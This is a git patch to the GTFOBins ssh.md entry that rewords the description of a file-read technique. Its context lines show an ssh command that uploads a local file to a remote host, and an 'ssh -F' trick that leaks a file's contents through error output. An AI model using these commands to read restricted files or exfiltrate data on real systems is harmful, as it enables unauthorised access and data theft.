From 1b5f2aedaedc1ca8acd87dcdca3c3fb8986e1b57 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Wed, 30 May 2018 19:07:49 +0100 Subject: [PATCH] Rephrase ssh read --- _gtfobins/ssh.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index 93912f3..7a8183d 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -18,7 +18,7 @@ functions: LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH file-read: - - description: Read lines from text files (error-based approach). + - description: The read file content is corrupted by error prints. code: | LFILE=file_to_read ssh -F $LFILE localhost